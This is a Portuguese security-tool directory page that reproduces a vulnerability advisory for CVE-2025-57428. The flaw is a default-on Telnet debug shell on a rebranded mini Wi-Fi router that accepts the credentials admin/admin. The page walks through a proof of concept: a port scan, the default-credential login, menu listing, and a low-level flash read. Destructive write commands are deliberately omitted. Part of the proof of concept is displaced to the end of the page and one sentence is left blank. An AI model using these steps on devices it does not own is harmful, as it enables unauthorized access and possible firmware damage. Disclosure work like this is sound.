Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-57428 — CVE-2025-57428 | Kitploit
Ferramentas/GitHubGitHub/5ulfur/cve-2025-57428
Segurança de Sistemas EmbarcadosSegurança IoTAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança de Hardware
GitHub5ulfur/cve-2025-57428

CVE-2025-57428

CVE-2025-57428

Ver Repositório
13há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

⚠️ Este repositório é mantido apenas como referência para CVE-2025-57428.
Para outros avisos e atualizações, consulte: security-advisories.

CVE-2025-57428 - Interface de depuração Telnet ativada por padrão permite acesso de baixo nível à flash/registradores

Produto Afetado

  • Fabricante/Marca: Each Italy
  • Dispositivo: Wireless Mini Router WIRELESS-N 300M
  • Firmware: v28K.MiniRouter.20190211

Resumo

Este dispositivo expõe uma interface de depuração Telnet (ativada por padrão na porta 23) e aceita credenciais de administrador (`admin`/`admin` por padrão). Após a autenticação, o shell fornece acesso direto a comandos de baixo nível (notadamente `spi` e `reg`), o que pode levar à corrupção arbitrária do firmware, ao brick do dispositivo e à perda de funcionalidade ou configuração de segurança.


Prova de Conceito

Nota: Eu omito intencionalmente comandos que realizam escritas destrutivas. A PoC abaixo confirma a existência e acessibilidade da interface sem fornecer um exploit pronto para uso.

  1. Escaneie o dispositivo na rede local:

    root@kitploit:~
    nmap -p 23 <device-ip>
    

    Resultado: a porta 23 (telnet) mostra open.

  2. Conecte-se via Telnet e autentique-se (credenciais padrão):

    root@kitploit:~
    telnet <device-ip>
    # Login as: admin
    # Password: admin
    

    Após o login, um prompt de depuração é apresentado CMD>.

  3. Liste os comandos disponíveis:

    root@kitploit:~
    CMD>help
    

    A saída de ajuda mostra os seguintes menus:

    root@kitploit:~
    cfg         net         os
    

    Entre no menu os:

    root@kitploit:~
    CMD>os
    

    Liste os comandos disponíveis novamente:

    root@kitploit:~
    OS>help
    

    Desta vez, a saída de ajuda mostra os seguintes comandos:

    root@kitploit:~
    thread      mem         spi         reg         cpuload     cpubusy     event
    

    Usar spi mostra .

Observações:

  • Alterar a senha de administrador pela interface web também altera as credenciais Telnet, indicando credenciais compartilhadas.
  • O Telnet permanece ativado por padrão após a configuração inicial.

Comunicação com o Fabricante

As tentativas de encontrar qualquer contato de segurança ou canal de suporte do fabricante original não tiveram sucesso. O produto parece ser um dispositivo rebatizado de origem desconhecida.

Aviso Legal

Esta informação é fornecida apenas para fins educacionais e defensivos. O autor não se responsabiliza por qualquer uso indevido desta informação.

Baixar ferramenta
spi <rd/wr/er> <addr> [len]
  • Leia a memória flash:

    root@kitploit:~
    OS>spi rd 0x000fd0f0 16
    

    Isso retorna um dump hexadecimal da região flash:

    root@kitploit:~
    4f30650a 938f56fa 1b663a19 e316d824
    

    Isso confirma que o comando funciona e o shell tem acesso de baixo nível. O comando de escrita (spi wr) e o comando de apagar (spi er), bem como os comandos reg, também são executáveis.